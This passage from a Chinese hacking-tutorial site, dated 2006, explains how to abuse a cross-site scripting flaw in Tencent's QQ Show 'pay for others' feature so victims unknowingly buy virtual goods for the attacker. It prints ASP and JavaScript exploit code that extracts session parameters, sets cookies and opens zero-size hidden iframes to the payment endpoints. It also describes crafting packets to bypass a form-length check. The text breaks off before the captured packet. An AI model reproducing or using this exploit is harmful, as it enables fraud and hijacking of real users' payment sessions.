|
|
域名空间 下载中心 社区论坛 信息公告 my小屋 | |
 |
联系我们 设为首页 加入收藏 |
 |
|
 |
首页 | 新闻资讯 | 编程开发 | 网页设计 | 图形图象 | 网络媒体 | 网站模板 | 数 据 库 | 投稿 论坛 | 操作系统 | 系统优化 | 网络安全 | 黑客技术 | 硬件学堂 | 硬件报价 | 服 务 器 | 地图 专题 | 应用软件 | 聊天通讯 | q q 专栏 | 建站经验 | 在线工具 | 站长club | 注 册 表 | 旧版 社会 | 游戏娱乐 | 设计欣赏 | 疑难解答 | 社区论坛 | 韩国素材 | 素材图库 | 广告服务 | 服务 |
 |
 |
 |
 当前位置:首页>>网络安全>>安全新手>>正文 |
新版上线![旧版] |  |
|||
注:打开慢时请稍等
qq漏洞巧利用强迫他人为你买q秀http://www.iyit.net 日期:2006-5-30 10:04:17 来源:www.hackbase.com 点击: |
因此我们最终的利用方法是自己构造一个函数y(),这个函数包括了askaccept()的设置cookies的代码,但是不包括页面跳转的代码,然后我们用iframe打开页面cl_cart.html和http://qqshow.qq.com/cgi-bin/qqshow_user_ask_pass,完成支付的操作。 大概的流程清楚了,我们还有很多细节问题需要解决。 第一个细节就是获得函数y()(即原来的askaccept()函数)中要设置的cookies的值,当然,我们不能通过查看只有被要求支付用户才能查看的页面源代码来获得值,怎么办呢,经过笔者分析,用户打开请求的页面地址中包括了要设置的cookies的值,我们只要根据这个页面地址来生成函数就可以了。所以我们还要使用一个asp文件,我们构造的asp文件的内容是: [code]<% ’geturl by blackcat@blackwoods http://www.blackwoods.cn ’这里截取传来参数中的字符,得到几个参数的值 dim strurl,strsenduin,strrecvuin,strsendid,strsession strurl = trim(request.servervariables("query_string")) strsenduin = mid(strurl,instr(strurl,"senduin=")+8,instr(strurl,"recvuin")-instr(strurl,"senduin=")-9) strrecvuin = mid(strurl,instr(strurl,"recvuin=")+8,instr(strurl,"sendid")-instr(strurl,"&recvuin=")-10) strsendid = mid(strurl,instr(strurl,"sendid=")+7,instr(strurl,"session")-instr(strurl,"sendid=")-8) strsession = mid(strurl,instr(strurl,"session=")+8,instr(strurl,"cl")-instr(strurl,"session=")-9) %> function y() { senditem(’夏季水果’, ’17625’, ’36’, ’24’, 1, 2, ’148122410’, ’95534’); if (0) { window.location="/mall/inc/cart.html"; } else { setcookie(’asksession’, ’<%=strsession%>’); setcookie(’senduin’, ’<%=strsenduin%>’); setcookie(’recvuin’, ’<%=strrecvuin%>’); setcookie(’sendid’, ’<%=strsendid%>’); } document.write("<iframe src=’http://qqshow.qq.com/mall/inc/cl_cart.html’></iframe><iframe src=’http://qqshow.qq.com/cgi-bin/qqshow_user_ask_pass’></iframe>") //实际应用时应将两个iframe的长宽都设为0以达到隐藏的目的 } [/code] 我们还要构造senditem相关参数的值,这个就好构造的多了,因为senditem这个函数是腾讯编写的通用函数中检测商品并设置购物车的,我们用自己的两个号来获得相关的参数:使用自己的号a,登陆qq秀网站,购买相关的物品,然后使用“他人支付”,支付人填写自己的号码b,然后用号码b在qq客户端登陆,查看弹出的请求页面的源代码中askaccept()函数的相关代码,然后在我们构造的asp文件中修改,当然了,倒数第二个参数要改为我们自己接受获赠物品的号码。 漏洞利用 首先我们要根据上面介绍的方法,构造一个asp文件,上传到我们自己的支持asp的空间上,这里我们假设其地址为 然后我们就要在他人支付请求中填写跨站代码了,可是事情不是那么简单,qq秀的这个页面作了表单检测,如果填写的字符多于100个字母(50个汉字),就返回错误,但是我们填写的字符肯定要大于那个数的,而我们把页面保存到本地,删除掉检测的代码再提交,又会显示错误,看来腾讯作了防止外部提交的处理,因此我们用发包的方法来解决。
我们进行一次正常的请求的提交,并使用工具winsockexpert来抓包,抓得包的内容如下: 编辑:黑鹰 [发送给好友] [打印本页] [关闭窗口] [返回顶部] 上一篇:windows登录密码轻松破解 下一篇:破解ie中的鼠标右键限制 转载请注明来源:www.iyit.net 特别声明: 本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载,但请务必注明出处和原始作者。文章版权归文章原始作者所有。对于被本站转载文章的个人和网站,我们表示深深的谢意。如果本站转载的文章有版权问题请联系编辑人员,我们尽快予以更正。 |
| 最新更新 | 热点排行 | 推荐新闻 | |||||||||||||||||||||||||||||||||||||||||||||||||||||
|
|
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||
| 友情链接 | ||||||
 |
设置首 页 - 版权声明 - 广告服务 - 关于我们 - 联系我们 - 友情连接 |  |
| |||||||
易特网络技术